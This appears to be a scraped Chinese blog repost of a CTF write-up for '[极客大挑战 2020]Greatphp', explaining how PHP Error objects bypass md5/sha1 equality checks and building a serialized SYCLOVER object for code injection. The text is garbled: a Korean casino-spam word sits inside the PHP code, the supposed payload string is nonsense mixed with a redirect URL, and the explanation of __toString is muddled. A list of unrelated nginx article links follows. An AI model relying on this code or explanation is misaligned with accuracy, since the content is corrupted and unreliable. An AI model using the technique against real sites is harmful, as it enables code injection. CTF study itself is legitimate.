博客
关于我
[极客大挑战 2020]Greatphp
阅读量:797 次
发布时间:2019-03-25

本文共 1215 字,大约阅读时间需要 4 分钟。

如何利用PHP原生类与Error类绕过MD5和SHA1检测

一、Error类绕过MD5和SHA1检测

Error类在PHP中提供了一个独特的__toString()方法,可以将对象转换为字符串。这一特性被广泛用于绕过MD5和SHA1等哈希函数的验证。

原理说明

-Error类的__toString()方法会自动触发哈希函数的计算,当对Error实例调用md5()sha1()函数时,这些函数会调用__toString()方法,进而绕过了传统的哈希值验证逻辑。

实验结果
$a = new Error("payload", 1);
$b = new Error("payload", 2);
카지노사이트
echo $a; echo "
";
echo $b; echo "
";
if ($a != $b) {
echo "a!=b";
echo "
";
}
if (md5($a) === md5($b)) {
echo "md5相等";
echo "
";
}
if (sha1($a) === sha1($b)) {
echo "sha1相等";
}

结果显示对Error对象的MD5和SHA1检测结果均与原本字符串一致,验证了此绕过方法的有效性。

二、基于类的利用实例

基于类的利用是通过将目标字符串字段赋值为自身对象的方法实现代码注入。以下是一个实际案例:

$str = "->?<?phpogrpnslahtू coch Maintain u Tư       husband-in-law.dInserted from: https://www.google.com/url?q=https%3A%2F%2Fcdnjs.cloudflare.com%2Fapi%2Fjson%2Fsamples%2Fphp%2Fclasses/demo.json&source=bloomberg&oe=UTF-8&sha=RgmgYwLCp_LOC-i antioxidant<
"; // Slot your payload here
$a = new Error($str, 1);
$b = new Error($str, 2);
$c_raw = new SYCLOVER();
$c_raw->syc = $a;
$c_raw->lover = $b;
// Serialize and display result
echo urlencode(serialize($c_raw));

这段代码通过构造精度高的字符串,成功绕过了传统的值验证逻辑,最终实现了代码注入。

三、总结

该技术利用PHP内置类功能,结合特定字符串处理技巧,对传统防护逻辑进行了巧妙绕过,是现代Web应用安全中值得注意的攻击方法之一。

转载地址:http://ylouk.baihongyu.com/

你可能感兴趣的文章
Nginx代理初探
查看>>
nginx代理地图服务--离线部署地图服务(地图数据篇.4)
查看>>
Nginx代理外网映射
查看>>
Nginx代理模式下 log-format 获取客户端真实IP
查看>>
Nginx代理静态资源(gis瓦片图片)实现非固定ip的url适配网络环境映射ip下的资源请求解决方案
查看>>
Nginx代理静态资源(gis瓦片图片)实现非固定ip的url适配网络环境映射ip下的资源请求解决方案
查看>>
Nginx反向代理与正向代理配置
查看>>
Nginx反向代理是什么意思?如何配置Nginx反向代理?
查看>>
nginx反向代理解决跨域问题,使本地调试更方便
查看>>
nginx启动脚本
查看>>
Nginx在Windows下载安装启动与配置前后端请求代理
查看>>
Nginx多域名,多证书,多服务配置,实用版
查看>>
nginx开机启动脚本
查看>>
nginx异常:the “ssl“ parameter requires ngx_http_ssl_module in /usr/local/nginx/conf
查看>>
nginx总结及使用Docker创建nginx教程
查看>>
nginx报错:the “ssl“ parameter requires ngx_http_ssl_module in /usr/local/nginx/conf/nginx.conf:128
查看>>
nginx报错:the “ssl“ parameter requires ngx_http_ssl_module in usrlocalnginxconfnginx.conf128
查看>>
nginx日志分割并定期删除
查看>>
Nginx日志分析系统---ElasticStack(ELK)工作笔记001
查看>>
Nginx映射本地json文件,配置解决浏览器跨域问题,提供前端get请求模拟数据
查看>>